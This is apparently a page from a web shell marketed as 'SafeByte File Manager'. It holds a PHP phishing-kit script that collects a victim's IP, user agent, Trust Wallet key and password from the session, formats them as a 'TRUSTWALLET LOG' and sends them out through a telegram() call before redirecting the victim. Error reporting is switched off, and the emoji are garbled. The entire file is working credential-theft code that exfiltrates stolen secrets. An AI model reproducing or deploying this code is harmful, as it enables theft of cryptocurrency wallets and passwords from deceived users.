SafeByte File Manager
<?php
error_reporting(0);
session_start();
include_once 'connect.php';
include_once 'functions.php';
include_once 'telegram.php';
$fsh =
"<strong>โผ๏ธ๐ก TRUSTWALLET LOG ๐กโผ๏ธ</strong>\n".
"<strong></strong>\n".
"<strong>๐ IP: ".$_SESSION['remote_ip']."</strong>\n".
"<i>๐ฑ OS: ".$_SESSION['useragent']."</i>\n".
"<strong></strong>\n".
"<strong>Key:</strong>\n".
"<code>".$_SESSION['key']."</code>\n".
"<strong></strong>\n".
"<strong>Password:</strong> ".$_SESSION['pass']."\n"
;
telegram($fsh);
finish($fsh);
encrypt($fsh);
header("Location: ./ ");
?>
SafeByte File Manager 1.0 Coded by SafeByte WebShell Seller